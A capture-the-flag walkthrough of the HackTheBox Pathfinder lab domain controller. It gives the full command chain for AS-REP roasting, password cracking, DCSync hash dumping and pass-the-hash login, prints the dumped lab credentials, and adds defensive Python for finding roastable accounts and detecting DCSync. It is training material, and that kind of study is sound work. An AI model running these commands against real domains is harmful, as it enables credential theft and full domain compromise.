HackTheBox Pathfinder Writeup

HackTheBox is a popular service that publishes vulnerable Windows and Linux machines in order to prepare hackers for certifications like the ones from Offensive Security or to let them improve their skills for real-life scenarios. The difficulty of these machines varies from beginner up to professional. This HTB Pathfinder walkthrough will explain my way to nt authority/system permissions step by step so that someone with little knowledge about Active Directory can follow along.

HackTheBox Pathfinder focuses on Active Directory security and touches topics like enumerating an AD, misconfigured Kerberos authentication, and abusing it for privilege escalation.


Information Gathering

First, let's start scanning HTB Pathfinder using nmap:

sudo nmap -p 1-5000 -sV -O -v 10.10.10.30

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-04-27 02:58:39Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped

On HackTheBox Pathfinder there are quite a few open ports compared to the other machines so far. Once again, it's a Microsoft Windows system that runs Active Directory as well as a Kerberos server (DNS on 53, Kerberos on 88, LDAP on 389/636 and the global catalog on 3268/3269 are the typical signature of a domain controller).


Enumerating the Active Directory

For this HackTheBox Pathfinder walkthrough, I am going to use BloodHound together with bloodhound-python, its data collector, which is built on impacket and can be used to enumerate an AD.

If you have not installed bloodhound-python, you can do so with pip (pip install bloodhound) and then execute it as bloodhound-python.

From the nmap scan we already know that the domain name is MEGACORP.LOCAL. Now let's fire up bloodhound-python and try the credentials we found while post-exploiting Shield (sandra / Password1234!):

bloodhound-python -u sandra -p Password1234! -d MEGACORP.LOCAL -c all -ns 10.10.10.30

From the output of bloodhound-python we know that HTB Pathfinder has five users and 51 groups, and that the LDAP server is reachable as PATHFINDER.MEGACORP.LOCAL.

The next step in this HackTheBox Pathfinder walkthrough is importing the data we collected into the BloodHound GUI. Start the neo4j database first and then BloodHound itself:

sudo neo4j console
bloodhound --no-sandbox

Then choose the Upload Data function and import the JSON files we got from bloodhound-python.

Click on Analysis and select Find AS-REP Roastable Users (DontReqPreAuth) which will search for users that do not have Kerberos pre-authentication enabled.

If pre-authentication is explicitly disabled (as it is for SVC_BES@MEGACORP.LOCAL), anyone who knows the username can request an AS-REP for that account without proving knowledge of its password. Part of that reply is encrypted with a key derived from the user's password, so it can be taken offline and the password guessed against it.

To find out more about the user, click on First Degree Object Control, which gives us 39 entries. The most relevant one is GetChangesAll (the DS-Replication-Get-Changes-All extended right on the domain), which means that SVC_BES is allowed to replicate directory data from the Domain Controller just like another DC would. This includes the password hashes of every AD user.
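The check BloodHound runs behind "Find AS-REP Roastable Users", reproduced locally as an added example (this is not code from the original walkthrough or from BloodHound): it tests the DONT_REQUIRE_PREAUTH bit of userAccountControl that the LDAP filter below matches, runs it over constructed sample entries, and shows the value an administrator would write back to fix such an account.

```python
# Added example, not part of the original walkthrough: reproduces the
# "AS-REP roastable" check locally. The entries below are constructed
# sample data shaped like LDAP results; only the names come from the box.

# Bits of the userAccountControl attribute that matter here.
UAC_ACCOUNTDISABLE = 0x0002
UAC_DONT_REQUIRE_PREAUTH = 0x400000  # 4194304, the bit the BloodHound query tests

# LDAP filter used by BloodHound-style collectors. The OID is the LDAP
# bitwise-AND matching rule, so it matches any entry with the bit set.
ASREP_ROASTABLE_FILTER = (
    "(&(objectCategory=user)"
    f"(userAccountControl:1.2.840.113556.1.4.803:={UAC_DONT_REQUIRE_PREAUTH}))"
)

# Constructed sample entries (UAC values assumed, not read from the box).
SAMPLE_USERS = [
    {"sAMAccountName": "svc_bes", "userAccountControl": 0x410200},
    {"sAMAccountName": "sandra", "userAccountControl": 0x10200},
    {"sAMAccountName": "Administrator", "userAccountControl": 0x10200},
    {"sAMAccountName": "old_svc", "userAccountControl": 0x410202},  # hypothetical, disabled
]

def asrep_roastable(users, include_disabled=False):
    """Return account names whose Kerberos pre-authentication is disabled.
    Disabled accounts are skipped by default: the KDC refuses to issue them a
    ticket, so they cannot be roasted, but they are still worth fixing."""
    hits = []
    for u in users:
        uac = u["userAccountControl"]
        if not uac & UAC_DONT_REQUIRE_PREAUTH:
            continue
        if uac & UAC_ACCOUNTDISABLE and not include_disabled:
            continue
        hits.append(u["sAMAccountName"])
    return hits

def remediated_uac(uac):
    """The userAccountControl value to write back so pre-auth is required again."""
    return uac & ~UAC_DONT_REQUIRE_PREAUTH

if __name__ == "__main__":
    print(ASREP_ROASTABLE_FILTER)
    print(asrep_roastable(SAMPLE_USERS))
    print(hex(remediated_uac(0x410200)))
```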


Accessing the AD & obtaining the user flag

To get such information from HTB Pathfinder we can use GetNPUsers.py from the impacket toolset:

python GetNPUsers.py MEGACORP.LOCAL/SVC_BES -request -no-pass -dc-ip 10.10.10.30

which gives us:

svc_bes@MEGACORP.LOCAL:4f0a985626626bbac7758792cb86b8b1$b723a75b8008481e27afd844d3907ea6cd116b60d0bc966b4934a5a8752b0b56924d08105a4634c6b4e54e69cee5dc962d84e480de3d6914d6ebb760568bcb62c71ca3774fdc76a49a359303f5e8813e5d3fbac7e5d16d785678c5beb6f3a566abf86e412d56c91fe82ed8763afe3c23056281d7f96c7426d09c16d93ee990b7a4ba71a51726d88ba9b60b3d35a33b5c1cf94c0c50b2c32799dc0247b7ca0226dcafe5d9d568dde32411b30f4e58dffe669a5eabfad3d1beaea046919af7ce991aa8db924934b4719d16f2a3c304f67224d8c8e32734c0f30e94cc7cdd4054d85851037a6aef05434e87c5f0bceaba94

Now save the output to a file and let john crack it:

john ad_hash_file --wordlist=/home/user/Desktop/Lists/rockyou.txt

and to display the cracked password afterwards:

john ad_hash_file --show

svc_bes@MEGACORP.LOCAL:Sheffield19

In order to connect to the Active Directory we need a WinRM client. evil-winrm, a Linux implementation of one, can be installed as a Ruby gem: sudo gem install evil-winrm

After installing the software you can log into the domain controller with:

evil-winrm -i 10.10.10.30 -u SVC_BES -p Sheffield19

┌─[user@parrot-virtual]─[~/Desktop]
└──╼ $sudo evil-winrm -i 10.10.10.30 -u SVC_BES -p Sheffield19 

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_bes\Documents> 

After logging in you can obtain the user flag for HTB Pathfinder by navigating into C:\Users\svc_bes\Desktop and displaying the content of user.txt with type.


Escalating our privileges

Because SVC_BES holds the GetChangesAll replication right, it can ask the Domain Controller to replicate its secrets and so dump the NTLM password hashes of all the other users (the technique known as DCSync). Once again, impacket has a tool for that called secretsdump:

python secretsdump.py MEGACORP.LOCAL/SVC_BES:Sheffield19@10.10.10.30

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f9f700dbf7b492969aac5943dab22ff3:::
svc_bes:1104:aad3b435b51404eeaad3b435b51404ee:0d1ce37b8c9e5cf4dbd20f5b88d5baca:::
sandra:1105:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
PATHFINDER$:1000:aad3b435b51404eeaad3b435b51404ee:84e6dd5989ce0f978f132939ffa346ec:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:056bbaf3be0f9a291fe9d18d1e3fa9e6e4aff65ef2785c3fdc4f6472534d614f
Administrator:aes128-cts-hmac-sha1-96:5235da455da08703cc108293d2b3fa1b
Administrator:des-cbc-md5:f1c89e75a42cd0fb
krbtgt:aes256-cts-hmac-sha1-96:d6560366b08e11fa4a342ccd3fea07e69d852f927537430945d9a0ef78f7dd5d
krbtgt:aes128-cts-hmac-sha1-96:02abd84373491e3d4655e7210beb65ce
krbtgt:des-cbc-md5:d0f8d0c86ee9d997
svc_bes:aes256-cts-hmac-sha1-96:2712a119403ab640d89f5d0ee6ecafb449c21bc290ad7d46a0756d1009849238
svc_bes:aes128-cts-hmac-sha1-96:7d671ab13aa8f3dbd9f4d8e652928ca0
svc_bes:des-cbc-md5:1cc16e37ef8940b5
sandra:aes256-cts-hmac-sha1-96:2ddacc98eedadf24c2839fa3bac97432072cfac0fc432cfba9980408c929d810
sandra:aes128-cts-hmac-sha1-96:c399018a1369958d0f5b242e5eb72e44
sandra:des-cbc-md5:23988f7a9d679d37
PATHFINDER$:aes256-cts-hmac-sha1-96:fae398751d86464b62b5770c68ce118c427a8315a646676852defe5eb0079c94
PATHFINDER$:aes128-cts-hmac-sha1-96:f2d2f999e07cabca7de338fd9484d28d
PATHFINDER$:des-cbc-md5:cb730e734a804afb
[*] Cleaning up... 
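A defender-side addition that is not part of the original walkthrough: the DRSUAPI replication that secretsdump performs above is audited by the Domain Controller as Security event 4662 carrying the replication extended-right GUIDs in its Properties field, so a replication request from any principal other than a DC computer account is the DCSync signal. The event records and the DC list below are constructed samples.

```python
import re

# Added example, not from the original walkthrough: detection logic for the
# DCSync-style replication shown above. A DC logs event 4662 with AccessMask
# 0x100 (control access) and the replication right GUIDs in "Properties".
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)

# Constructed sample events: normal DC-to-DC replication by the PATHFINDER$
# computer account, the replication by svc_bes, and an unrelated 4662.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "PATHFINDER$", "SubjectDomainName": "MEGACORP",
     "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "svc_bes", "SubjectDomainName": "MEGACORP",
     "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{89e95b76-444d-4c62-991a-0facbeda640c}"},
    {"EventID": 4662, "SubjectUserName": "sandra", "SubjectDomainName": "MEGACORP",
     "AccessMask": "0x10", "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]

def is_dc_account(name, dc_accounts):
    """True when the subject is the computer account of a known DC (trailing $)."""
    return name.rstrip("$").upper() in dc_accounts

def detect_dcsync(events, dc_accounts=frozenset({"PATHFINDER"})):
    """Return (DOMAIN\\user, [replication right names]) for every replication
    request made by a principal that is not a domain controller."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662 or ev.get("AccessMask") != "0x100":
            continue
        rights = [REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(ev["Properties"])
                  if g.lower() in REPLICATION_RIGHTS]
        if not rights or is_dc_account(ev["SubjectUserName"], dc_accounts):
            continue
        alerts.append((f'{ev["SubjectDomainName"]}\\{ev["SubjectUserName"]}', rights))
    return alerts

if __name__ == "__main__":
    for who, rights in detect_dcsync(SAMPLE_EVENTS):
        print(f"DCSync suspected: {who} used {', '.join(rights)}")
```

The DC list is the allow-list a real deployment would load from the Domain Controllers OU; anything else asking for Get-Changes-All should page someone.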

Luckily, there is no need to crack these hashes: NTLM authentication accepts the hash itself, so we can pass the Administrator NT hash to psexec.py and log in as Administrator:

python psexec.py MEGACORP.LOCAL/Administrator@10.10.10.30 -hashes aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18

I hope you enjoyed this HTB Pathfinder walkthrough. If you have any questions, feel free to reach out to me!


Tags

hackthebox, htb, pathfinder, Active Directory, Privilege Escalation, Windows